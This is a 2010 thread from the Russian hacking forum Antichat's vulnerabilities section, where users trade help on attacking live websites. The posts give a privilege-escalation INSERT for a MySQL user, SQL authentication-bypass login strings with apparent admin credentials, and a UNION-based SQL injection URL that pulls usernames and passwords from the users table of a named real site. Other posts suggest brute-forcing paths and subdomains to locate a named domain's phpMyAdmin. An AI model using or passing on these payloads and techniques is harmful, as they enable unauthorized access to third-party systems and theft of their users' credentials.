ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11281  
Старый 19.01.2010, 20:54
Аватар для v1d0qz
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

Цитата:
Сообщение от wkar  
Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
Код:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе?
Столько ошибок в одной строчке не в обиду, но больше читай мануалы, это совет

user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос.
INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)

Последний раз редактировалось v1d0qz; 19.01.2010 в 21:06..
 
Ответить с цитированием

  #11282  
Старый 19.01.2010, 21:09
Аватар для wkar
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

А каким еще способом можно увеличить привилегии юзера бд.
Система фрибсд 7.2.
 
Ответить с цитированием

  #11283  
Старый 20.01.2010, 13:00
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от mff  
Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть
Возможен auth bypass,не фильтруються переменные логина и пароля....
Я не смотрел,но может поможет в дальнейшем.
ЗЫ:login -
' or 1=1/*
admin'/*

Цитата:
admin:testadmin

Последний раз редактировалось S00pY; 20.01.2010 в 13:05..
 
Ответить с цитированием

  #11284  
Старый 20.01.2010, 16:12
Аватар для GinTonic
GinTonic
Новичок
Регистрация: 18.12.2009
Сообщений: 13
Провел на форуме:
96637

Репутация: 0
По умолчанию

что за инъекция:...
Цитата:
http://www.aaadtc.com/page.php?content=buy&cnum=21
подставляя кавычку
Цитата:
http://www.aaadtc.com/page.php?content=buy&cnum=21'
вылетает ошибка
Цитата:
Fatal error: Call to a member function execute() on a non-object in /home/.rhino/lsdtc/mydtcbusiness.com/clientsites/bigdeli_nader/data/buy.php on line 92
После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...
Цитата:
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=0+union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
что это такое?
 
Ответить с цитированием

  #11285  
Старый 20.01.2010, 16:52
Аватар для mff
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
 
Ответить с цитированием

  #11286  
Старый 20.01.2010, 16:58
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Цитата:
Сообщение от mff  
Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
Брутить пути и субдомены =)
Если phpmyadmin там есть вообще...
billing.centre.ru это не пойдет?
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #11287  
Старый 20.01.2010, 19:08
Аватар для Ugol
Ugol
Познающий
Регистрация: 26.12.2009
Сообщений: 66
Провел на форуме:
70384

Репутация: -25
По умолчанию

Посмотри в (субдоменны ))
 
Ответить с цитированием

  #11288  
Старый 20.01.2010, 19:22
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
 
Ответить с цитированием

  #11289  
Старый 20.01.2010, 20:33
Аватар для GinTonic
GinTonic
Новичок
Регистрация: 18.12.2009
Сообщений: 13
Провел на форуме:
96637

Репутация: 0
По умолчанию

Цитата:
Сообщение от ElteRUS  
GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
а почему ноль на двойку заменил?
и почему в 3 и 12?

Последний раз редактировалось GinTonic; 20.01.2010 в 20:39..
 
Ответить с цитированием

  #11290  
Старый 20.01.2010, 21:09
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Цитата:
Сообщение от GinTonic  
а почему ноль на двойку заменил?
и почему в 3 и 12?
смотри внимательней
Цитата:
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ